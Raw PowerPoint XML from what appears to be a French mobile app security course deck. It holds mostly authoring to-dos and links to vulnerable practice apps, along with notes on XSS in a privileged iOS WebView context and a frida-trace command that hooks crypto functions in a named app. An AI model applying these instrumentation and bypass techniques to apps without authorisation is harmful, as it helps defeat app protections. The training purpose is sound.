              <a:t> un tableau de correspondance =&gt; analyse dynamique / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" err="1"/>
              <a:t>statqiue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" err="1"/>
              <a:t>runtime</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="130685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61800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47721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3887974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9771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493222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430610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338545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37503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907560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312341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99943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168167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405464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339078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893477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844577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437869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2530325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37873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4157704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 une description du mode de déroulement =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>therorie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> =&gt; étude de cas =&gt; challenge =&gt; comment corriger</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1346768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 le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>learning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>path</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2269387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58126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To do :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Option 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1137180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Mise en forme</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1321296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https://www.futurelearn.com/info/courses/secure-android-app-development/0/steps/21594</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2720934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Also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>philkeeble.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>ios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>/reverse-engineering/iOS-Bypass-Jailbreak/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2817166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Also : https://philkeeble.com/ios/reverse-engineering/iOS-Bypass-Jailbreak/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1531545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Formater le code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="838327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dirty="0"/>
              <a:t>Appli à télécharger depuis  : https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200"/>
              <a:t>/mohammedshine/MOBILEAPP_PENTESTING_101/tree/master/VulnerableApplications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="373326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93903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352367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Commande =&gt; string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>/periscope_1.25.5.93.apk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3564333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Commande =&gt; string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>/periscope_1.25.5.93.apk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1737811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code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36403653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code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3873607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dirty="0"/>
              <a:t>Ajouter le lien</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>apkpure.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>/deep-link-tester/org.thewheatfield.android.deeplinks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1348990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15212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err="1"/>
              <a:t>Hide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> the face </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2856132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err="1"/>
              <a:t>Conver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200"/>
              <a:t> cmd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2331597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56846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3571034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err="1"/>
              <a:t>Convert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200"/>
              <a:t> cmd</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Host html content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>7as.es/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>android</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>periscope</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4048944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err="1"/>
              <a:t>Convert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200"/>
              <a:t> cmd</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Host html content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>7as.es/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>android</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>periscope</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4208602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4051914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Image to code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="668569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1919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41095832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i="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/prateek147/DVIA-v2/blob/master/DVIA-v2/DVIA-v2/Info.plist</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2267017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850587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684753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86728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3769992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692433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342979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575748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749879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846061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Mettre à jour les screen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>shost</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2510793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Modifier le code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33226219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40225705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833113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Ajouter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0"/>
              <a:t> un schéma explique le principe des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0"/>
              <a:t> dans le cadre d’une appli ios</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="257700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18346182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154461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804539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1014833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Exploitation de la vulnérabilité XSS depuis un contexte privilégié (applewebdata://) :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4023993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Exploitation de la vulnérabilité XSS depuis un contexte privilégié (applewebdata://) :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17411130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Exploitation de la vulnérabilité XSS depuis un contexte privilégié (applewebdata://) :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1112368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Exploitation de la vulnérabilité XSS depuis un contexte privilégié (applewebdata://) :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6520963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dirty="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>again</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1321360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a:t>Exploitation de la vulnérabilité XSS depuis un contexte privilégié (applewebdata://) :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3861296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Add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>referece</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>frida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>frida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>-trace \ -U \ -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>com.toyopagroup.picaboo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> \ -I "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>libcommonCrypto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>*« </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35373A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="35373A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35373A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t> is to hook C function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35373A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>-m is to hook Objective-C function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35373A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>-U stands for "USB" (find device attached by USB)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35373A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>You can use either </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="35373A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35373A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t> or application name retrieved from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="35373A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>frida-ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35373A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t> -U output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34809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 non-répudiation signifie la possibilité de vérifier que l'envoyeur et le destinataire sont bien les parties qui disent avoir respectivement envoyé ou reçu le message =&gt; SIGNATURE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6191342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Add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>referece</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>frida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> scripts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3662847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Mettre à jour les liens vers les pages APK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7172763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990199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Exemple de faiblesse : https://zachgrace.com/posts/attacking-ecb/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13631649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6667027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Realm is an open source object database management system, initially for mobile operating systems but also available for platforms such as Xamarin, React Native, and others, including desktop applications, and is licensed under the Apache License. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Wikipedia</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FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1197875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3972292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1510606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8747704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999926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4.bin"/><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nk.com/" TargetMode="External"/><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2777091053"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1513" y="1589"/>
          <a:ext cx="1511"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8" name="Object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 y="1589"/>
                        <a:ext cx="1511"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nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1760724" y="4596565"/>
            <a:ext cx="6925338" cy="587374"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" noProof="0"/>
              <a:t>Cliquez et modifiez le titre</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1760724" y="5255948"/>
            <a:ext cx="6925338" cy="477309"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="108000" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="2000" i="1">
                <a:solidFill>
                  <a:srgbClr val="5E6A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noProof="0"/>
              <a:t>Cliquez pour modifier le style des sous-titres du masque</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text Placeholder 31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1760724" y="5715720"/>
            <a:ext cx="4580314" cy="377577"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="108000" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="177800" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="355600" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="541338" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="719138" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
